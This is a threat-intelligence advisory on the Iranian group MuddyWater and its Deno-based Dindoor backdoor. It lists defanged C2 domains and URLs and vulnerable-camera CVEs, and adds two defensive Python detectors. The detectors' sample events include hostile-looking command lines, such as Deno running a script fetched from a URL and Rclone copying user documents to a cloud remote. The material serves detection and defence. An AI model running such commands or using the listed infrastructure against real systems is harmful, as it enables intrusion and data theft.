Escalating Iranian APT Activity and MuddyWater’s Deployment of the Dindoor Backdoor

Summary:

Recent intelligence indicates an escalation in Iranian state-sponsored cyber operations linked to the MuddyWater advanced persistent threat (APT) group, which is associated with Iran’s Ministry of Intelligence and Security (MOIS). The campaign has primarily targeted organizations in sectors such as banking, aviation, nonprofit institutions, and defense supply chains across the United States and allied nations.

Attackers have deployed a newly identified backdoor known as Dindoor, which leverages the Deno JavaScript runtime to establish persistent access within compromised environments. The malware enables remote command execution and may facilitate data exfiltration through cloud-based infrastructure. The activity reflects Iran’s increasing reliance on credential compromise, cloud abuse, and targeted intrusion campaigns during periods of geopolitical tension, highlighting the need for stronger identity protection, network monitoring, and defensive security controls.

Technical Description:

The intrusion activity attributed to the Iranian-affiliated MuddyWater group involves the deployment of a newly identified backdoor called Dindoor. This malware leverages the Deno JavaScript runtime to execute malicious scripts and maintain persistent access within compromised networks.

Following initial access through spear-phishing, credential compromise, or exploitation of vulnerable services, attackers establish persistence and introduce additional tools to support post-exploitation activities. Observed tooling includes the Python-based Fakeset backdoor and the file synchronization utility Rclone, which is used to stage and potentially exfiltrate data to external cloud storage platforms.

The malware payloads are delivered from trusted cloud infrastructure and digitally signed using certificates previously associated with MuddyWater-linked malware families such as Stagecomp and Darkcomp. This approach allows attackers to blend malicious activity with legitimate cloud traffic while conducting reconnaissance, lateral movement, and data collection inside targeted environments. The details of the campaign are discussed in the sections below.

Delivery and Infection Chain:

Initial access is most likely achieved through spear-phishing, credential harvesting, or the exploitation of vulnerable internet-facing services. MuddyWater operators frequently rely on compromised credentials, social engineering, and password spraying rather than zero-day vulnerabilities to enter targeted environments.

In this campaign, malware payloads, including the Fakeset Python backdoor, were downloaded from legitimate cloud infrastructure, enabling attackers to bypass traditional security controls and disguise malicious activity within legitimate network traffic. The infection chain was identified as follows:

  • The attack typically begins with initial access through spear-phishing, credential harvesting, or password spraying targeting user accounts or externally exposed services within the victim organization.
  • After gaining access, attackers establish a foothold in the environment and conduct reconnaissance to identify valuable systems, user privileges, and network architecture while preparing for further payload deployment.
  • The operators then deploy the Dindoor backdoor, which uses the Deno JavaScript runtime to execute malicious scripts and maintain persistent communication with attacker-controlled command-and-control infrastructure.
  • Additional malware such as the Fakeset Python backdoor may be deployed to maintain redundant access and facilitate lateral movement across compromised systems.
  • Finally, attackers leverage tools such as Rclone to stage and potentially exfiltrate sensitive data to attacker-controlled cloud storage services, enabling long-term espionage and data theft.

Technical Capabilities:

The primary capability observed in this campaign is the deployment of the Dindoor backdoor, which uses the Deno JavaScript runtime to execute malicious scripts on compromised systems. By leveraging a lightweight runtime environment commonly associated with legitimate development operations, the malware can blend into normal system processes and evade detection.

The backdoor establishes persistent communication with attacker-controlled command-and-control infrastructure, enabling attackers to issue commands, execute scripts, gather system information, and maintain long-term access within targeted environments.

In addition to Dindoor, attackers deploy auxiliary tools to expand operational capabilities and maintain redundancy within compromised networks. The Fakeset Python-based backdoor provides an alternative access mechanism, ensuring continued control even if one access channel is disrupted.

Attackers also utilize legitimate tools such as Rclone to stage and exfiltrate sensitive data to external cloud storage providers. By embedding malicious operations within legitimate network activity, the attackers reduce the likelihood of detection while enabling stealthy reconnaissance, lateral movement, and data exfiltration. These capabilities demonstrate a threat actor focused on long-term espionage and covert intelligence collection.

Attribution and Evolution:

The activity has been attributed to MuddyWater, also known as Seedworm, an Iranian state-sponsored threat group linked to the Ministry of Intelligence and Security. Historically, MuddyWater has targeted financial institutions, telecommunications providers, government organizations, and critical infrastructure sectors across multiple regions.

Over time, the group has evolved from relying on simple scripting techniques and commodity malware toward developing more sophisticated tooling, including custom backdoors and improved operational security measures designed to evade attribution and detection.

Active Campaign and Geographic Spread:

Recent activity associated with this campaign has targeted organizations in North America, including the United States and Canada, across sectors such as banking, aviation, nonprofit organizations, and defense-related software providers.

The campaign has also emerged within the broader context of rising geopolitical tensions involving Iran, Israel, and Western allies. Simultaneously, scanning and exploitation attempts have been reported against internet-connected edge devices and surveillance infrastructure across the Middle East and Gulf region, including the United Arab Emirates, Qatar, Bahrain, and Kuwait.

Conclusion:

The discovery of the Dindoor backdoor highlights the continued expansion of Iranian cyber capabilities and the strategic role of cyber operations in geopolitical conflicts. MuddyWater’s use of legitimate cloud infrastructure, credential-based access techniques, and lightweight malware frameworks demonstrates a deliberate emphasis on stealth, persistence, and operational flexibility.

Organizations should strengthen monitoring of cloud activity, implement robust identity security controls, and restrict exposure of internet-facing systems in order to mitigate the risks posed by similar intrusion campaigns.


IOC and Context Details:

Tactic Name: Initial Access, Persistence, Command and Control, Credential Access, Exfiltration
Technique Name: Spear-phishing; Password Spraying; Valid Accounts; Command and Scripting Interpreter; Exfiltration Over Web Services
Sub Technique Name: Phishing via Email; Credential Harvesting; JavaScript Execution via Deno Runtime; Python Backdoor Deployment; Cloud Storage Data Exfiltration
Attack Type: Malware
Targeted Applications: Cloud storage platforms, enterprise identity systems, internet-facing services, surveillance camera systems (Hikvision, Dahua)
Region Impacted: United States, Canada, Israel, UAE, Qatar, Bahrain, Kuwait, Lebanon, Cyprus
Industry Impacted: Banking and financial services, aviation/airports, non-profit organizations, defense and aerospace suppliers

IOCs (Domains and IP addresses):
106[.]187[.]38[.]21
arbiogaz[.]com
azmwn[.]suliparwarda[.]com
bangortalk[.]org[.]uk
best2[.]thebestconference[.]org
camco[.]com[.]pk
cbpexbrasilia[.]com[.]br
cgss[.]com[.]pk
diplomat[.]com[.]sa
feribschat[.]eu
ghanaconsulate[.]com[.]pk
magical-energy[.]com
mainandstrand[.]com
riyadhfoods[.]com
school[.]suliparwarda[.]com
suliparwarda[.]com
tmclub[.]eu
watyanagr[.]nfe[.]go[.]th
whiver[.]in
www[.]4seasonrentacar[.]com
www[.]akhtaredanesh[.]com
www[.]arcadecreative[.]com
www[.]armaholic[.]com
www[.]asan-max[.]com
www[.]autotrans[.]hr
www[.]dafc[.]co[.]uk
www[.]eapa[.]org
www[.]elev8tor[.]com
www[.]jdarchs[.]com
www[.]kunkrooann[.]com
www[.]mackellarscreenworks[.]com
www[.]mitegen[.]com
www[.]nigelwhitfield[.]com
www[.]pomegranates[.]org
www[.]ridefox[.]com
www[.]shapingtomorrowsworld[.]org
www[.]vanessajackson[.]co[.]uk
www[.]yaran[.]co
www[.]ztm[.]waw[.]pl
coa[.]inducks[.]org
mhtevents[.]com
skepticalscience[.]com
wallpapercase[.]com
www[.]spearhead-training[.]com

SHA-256 Hash:

URLs:
hxxp://106[.]187[.]38[.]21/short_qr/work[.]php?c=
hxxp://arbiogaz[.]com/upload/work[.]php?c=
hxxp://azmwn[.]suliparwarda[.]com/wp-content/plugins/wpdatatables/panda[.]php?c=
hxxp://azmwn[.]suliparwarda[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
hxxp://bangortalk[.]org[.]uk/speakers[.]php?c=
hxxp://best2[.]thebestconference[.]org/ccb/browse_cat[.]php?c=
hxxp://camco[.]com[.]pk/Controls/data[.]aspx?c=
hxxp://cbpexbrasilia[.]com[.]br/wp-content/plugins/wordpress-seo/power[.]php?c=
hxxp://cbpexbrasilia[.]com[.]br/wp-includes/widgets/work[.]php?c=
hxxp://cgss[.]com[.]pk/data[.]aspx?c=
hxxp://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c=
hxxp://feribschat[.]eu/logs[.]php?c=
hxxp://ghanaconsulate[.]com[.]pk/data[.]aspx?c=
hxxp://magical-energy[.]com/css[.]aspx?c=
hxxp://magical-energy[.]com/css/css[.]aspx?c=
hxxp://mainandstrand[.]com/work[.]php?c=
hxxp://riyadhfoods[.]com/css/edu[.]aspx?c=
hxxp://riyadhfoods[.]com/jquery-ui/js/jquery[.]aspx?c=
hxxp://school[.]suliparwarda[.]com/components/com_akeeba/work[.]php?c=
hxxp://school[.]suliparwarda[.]com/plugins/editors/codemirror/work[.]php?c=
hxxp://suliparwarda[.]com/includes/panda[.]php?c=
hxxp://suliparwarda[.]com/layouts/joomla/logs[.]php?c=
hxxp://suliparwarda[.]com/wp-content/plugins/entry-views/work[.]php?c=
hxxp://suliparwarda[.]com/wp-content/themes/twentyfifteen/work[.]php?c=
hxxp://tmclub[.]eu/clubdata[.]php?c=
hxxp://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c=
hxxp://watyanagr[.]nfe[.]go[.]th/watyanagr/power[.]php?c=
hxxp://whiver[.]in/power[.]php?c=
hxxp://www[.]4seasonrentacar[.]com/viewsure/data[.]aspx?c=
hxxp://www[.]akhtaredanesh[.]com/d/file/sym/work[.]php?c=
hxxp://www[.]akhtaredanesh[.]com/d/oschool/power[.]php?c=
hxxp://www[.]arcadecreative[.]com/work[.]php?c=
hxxp://www[.]armaholic[.]com/list[.]php?c=
hxxp://www[.]asan-max[.]com/files/articles/css[.]aspx?c=
hxxp://www[.]asan-max[.]com/files/articles/large/css[.]aspx?c=
hxxp://www[.]autotrans[.]hr/index[.]php?c=
hxxp://www[.]dafc[.]co[.]uk/news[.]php?c=
hxxp://www[.]eapa[.]org/asphalt[.]php?c=
hxxp://www[.]elev8tor[.]com/show-work[.]php?c=
hxxp://www[.]jdarchs[.]com/work[.]php?c=
hxxp://www[.]kunkrooann[.]com/inc/work[.]php?c=
hxxp://www[.]mackellarscreenworks[.]com/work[.]php?c=
hxxp://www[.]mitegen[.]com/mic_catalog[.]php?c=
hxxp://www[.]nigelwhitfield[.]com/v2/work[.]php?c=
hxxp://www[.]pomegranates[.]org/index[.]php?c=
hxxp://www[.]ridefox[.]com/content[.]php?c=
hxxp://www[.]shapingtomorrowsworld[.]org/category[.]php?c=
hxxp://www[.]vanessajackson[.]co[.]uk/work[.]php?c=
hxxp://www[.]yaran[.]co//wp-content/plugins/so-masonry/logs[.]php?c=
hxxp://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c=
hxxp://www[.]ztm[.]waw[.]pl/pop[.]php?c=
hxxps://coa[.]inducks[.]org/publication[.]php?c=
hxxps://mhtevents[.]com/account[.]php?c=
hxxps://skepticalscience[.]com/graphics[.]php?c=
hxxps://wallpapercase[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
hxxps://wallpapercase[.]com/wp-includes/customize/logs[.]php?c=
hxxps://www[.]spearhead-training[.]com//html/power[.]php?c=
hxxps://www[.]spearhead-training[.]com/work[.]php?c=
CVE: CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2021-33044, CVE-2025-34067
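The indicators above are published defanged (hxxp, [.]) and share one shape: a .php or .aspx script taking a lone "c" query parameter. The following Python is an added example, not part of the advisory or of any vendor tooling: it refangs a subset of the listed domains and URLs, matches them against constructed proxy log lines, and additionally flags the generic "<script>.php?c=" shape as a lower-confidence heuristic (that heuristic is an assumption of this example, not an indicator from the advisory). The log format, the client IPs, the example.com entries and the values after c= are all constructed for the demo.

```python
import re
from urllib.parse import urlparse, parse_qs

# Defanged indicators copied from the advisory's IOC list (a subset).
DEFANGED_DOMAINS = [
    "106[.]187[.]38[.]21",
    "arbiogaz[.]com",
    "suliparwarda[.]com",
    "www[.]yaran[.]co",
]
DEFANGED_URLS = [
    "hxxp://arbiogaz[.]com/upload/work[.]php?c=",
    "hxxp://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c=",
    "hxxps://www[.]spearhead-training[.]com/work[.]php?c=",
]


def refang(ioc: str) -> str:
    """Convert a defanged indicator back to its live form for matching."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
URLS = {refang(u) for u in DEFANGED_URLS}

# Every URL in the advisory ends in a .php/.aspx script that takes a lone
# "c" parameter. Matching that shape is a heuristic added here (assumption,
# not an advisory IOC) to surface the same pattern on hosts not yet listed.
SCRIPT_RE = re.compile(r"\.(php|aspx)$", re.IGNORECASE)


def classify_url(url: str) -> str:
    p = urlparse(url)
    host = (p.hostname or "").lower()
    # Exact-URL IOC: compare scheme, host and path plus the bare "c="
    # prefix, ignoring whatever value the beacon appended after it.
    if f"{p.scheme}://{p.netloc}{p.path}?c=" in URLS:
        return "ioc_url"
    # Domain IOC: exact host or any subdomain of a listed domain.
    if host in DOMAINS or any(host.endswith("." + d) for d in DOMAINS):
        return "ioc_domain"
    params = parse_qs(p.query, keep_blank_values=True)
    if SCRIPT_RE.search(p.path) and list(params) == ["c"]:
        return "suspicious_pattern"
    return "clean"


# Constructed proxy log lines: "<timestamp> <client> <method> <url> <status>"
SAMPLE_PROXY_LOG = """\
2024-01-01T10:00:01Z 10.0.0.5 GET http://arbiogaz.com/upload/work.php?c=ZXhhbXBsZQ 200
2024-01-01T10:00:02Z 10.0.0.5 GET http://school.suliparwarda.com/index.php?c=1 200
2024-01-01T10:00:03Z 10.0.0.7 GET https://example.com/index.php?c= 200
2024-01-01T10:00:04Z 10.0.0.7 GET https://example.com/index.php?page=2 200
2024-01-01T10:00:05Z 10.0.0.9 GET http://106.187.38.21/short_qr/work.php?c=QUJD 200
"""


def scan_proxy_log(text: str):
    """Return (client, url, verdict) for every request that is not clean."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed or truncated line: skip rather than crash
        _ts, client, _method, url, _status = parts[:5]
        verdict = classify_url(url)
        if verdict != "clean":
            hits.append((client, url, verdict))
    return hits


if __name__ == "__main__":
    for client, url, verdict in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{verdict:<18} {client:<10} {url}")
```

The exact-URL match deliberately strips the value after c= because that value is the per-victim or per-task data the beacon sends, so comparing full URLs would never match. Treat "suspicious_pattern" hits as triage leads rather than confirmed indicators, since legitimate sites also use short query parameters.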

Recommended Actions:

  • Implement phishing-resistant multi-factor authentication across all user accounts, particularly for privileged accounts and remote access services, to reduce the risk of credential compromise and password spraying attacks.
  • Conduct regular patch management and vulnerability remediation for internet-facing systems, including VPN gateways, edge devices, and surveillance infrastructure.
  • Restrict and monitor the use of administrative privileges and remote access tools while enforcing the principle of least privilege.
  • Enhance network monitoring and logging to detect unusual outbound connections, suspicious command execution activity, and communication with external cloud storage services.
  • Implement network segmentation to restrict lateral movement and isolate critical systems such as financial platforms, operational technology, and sensitive databases.
  • Monitor for abnormal usage of legitimate tools such as Rclone or scripting environments that may be abused for data staging or data exfiltration.
  • Strengthen email security controls and user awareness programs to reduce the likelihood of successful spear-phishing or social engineering attacks.
  • Maintain secure offline backups of critical data and ensure tested incident response procedures are in place to enable rapid containment and recovery in the event of compromise.
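The monitoring recommendations above (abnormal use of Rclone and scripting runtimes, suspicious command execution) can be turned into concrete process-creation detections. The following Python is an added example written for this advisory, not code from the advisory or from any vendor: it evaluates constructed process-creation events with Sysmon-style field names (Image, CommandLine, User) and flags Rclone transfers to a configured remote by an unsanctioned account, Deno executing a script fetched from a URL, and Deno running with broad permission flags from a user-writable directory. The sanctioned-user allowlist, the 203.0.113.10 host, the remote names and the user-writable path markers are assumptions made for the demo.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1-like shape
# (field names borrowed from Sysmon; every value is made up for this demo).
EVENTS = [
    {"User": "CORP\\alice", "Image": r"C:\Users\alice\AppData\Local\deno\deno.exe",
     "CommandLine": r"deno.exe run -A http://203.0.113.10/task.js"},
    {"User": "CORP\\alice", "Image": r"C:\Users\alice\AppData\Local\Temp\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Users\alice\Documents remote1:staging --transfers 8"},
    {"User": "CORP\\bob", "Image": r"C:\Program Files\deno\deno.exe",
     "CommandLine": r"deno.exe run --allow-net C:\dev\app\server.ts"},
    {"User": "CORP\\svc_backup", "Image": r"C:\Tools\rclone\rclone.exe",
     "CommandLine": r"rclone.exe sync D:\backups backupremote:nightly"},
    {"User": "CORP\\bob", "Image": r"C:\Tools\rclone\rclone.exe",
     "CommandLine": r"rclone.exe version"},
    {"User": "CORP\\carol", "Image": r"C:\Users\carol\Downloads\deno.exe",
     "CommandLine": r"deno.exe run --allow-all C:\Users\carol\AppData\Roaming\update.ts"},
]

# Assumption: the backup service account is the only sanctioned rclone user.
RCLONE_ALLOWED_USERS = {"corp\\svc_backup"}
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto", "mount"}
# rclone addresses a configured remote as "<name>:<path>". Requiring two or
# more leading characters keeps Windows drive letters such as C:\ from matching.
RCLONE_REMOTE_RE = re.compile(r"^[a-z0-9_-]{2,}:", re.IGNORECASE)
# Deno permission flags that grant network, process or file-write access.
DENO_BROAD_PERMS = {"-A", "--allow-all", "--allow-net", "--allow-run", "--allow-write"}
# Path fragments treated as user-writable (assumption for this demo).
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                         "\\public\\", "\\programdata\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable_dir(path: str) -> bool:
    p = path.lower().replace("/", "\\")
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def check_rclone(ev: dict):
    """Flag data transfers to a cloud remote by an account not on the allowlist."""
    tokens = ev["CommandLine"].split()
    verb = tokens[1].lower() if len(tokens) > 1 else ""
    remotes = [t for t in tokens[2:] if RCLONE_REMOTE_RE.match(t)]
    if verb in RCLONE_TRANSFER_VERBS and remotes:
        if ev["User"].lower() not in RCLONE_ALLOWED_USERS:
            return "rclone_cloud_transfer_unsanctioned_user"
    return None


def check_deno(ev: dict):
    """Flag remote-script execution and broad permissions from user-writable paths."""
    tokens = ev["CommandLine"].split()
    if "run" not in tokens:
        return None
    after = tokens[tokens.index("run") + 1:]
    flags = {t for t in after if t.startswith("-")}
    script = next((t for t in after if not t.startswith("-")), "")
    if script.lower().startswith(("http://", "https://")):
        return "deno_remote_script"
    if flags & DENO_BROAD_PERMS and (in_user_writable_dir(script)
                                     or in_user_writable_dir(ev["Image"])):
        return "deno_broad_perms_from_user_dir"
    return None


def detect(events):
    """Return (event index, rule name, user) for every event that trips a rule."""
    alerts = []
    for i, ev in enumerate(events):
        name = basename(ev["Image"])
        rule = None
        if name == "rclone.exe":
            rule = check_rclone(ev)
        elif name == "deno.exe":
            rule = check_deno(ev)
        if rule:
            alerts.append((i, rule, ev["User"]))
    return alerts


if __name__ == "__main__":
    for idx, rule, user in detect(EVENTS):
        print(f"event {idx}: {rule} ({user})")
```

Matching on the image basename is a starting point only; an operator can rename the binary, so in production pair these rules with file hash or signer checks and with the outbound-connection monitoring the list above recommends. The developer running deno with --allow-net from a non-writable install path (event 2) is intentionally not flagged, which is the kind of baseline exception such rules need to avoid drowning analysts in noise.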

Reference:

https://www.infosecurity-magazine.com/news/iran-muddywater-hackers-us-firms/

https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/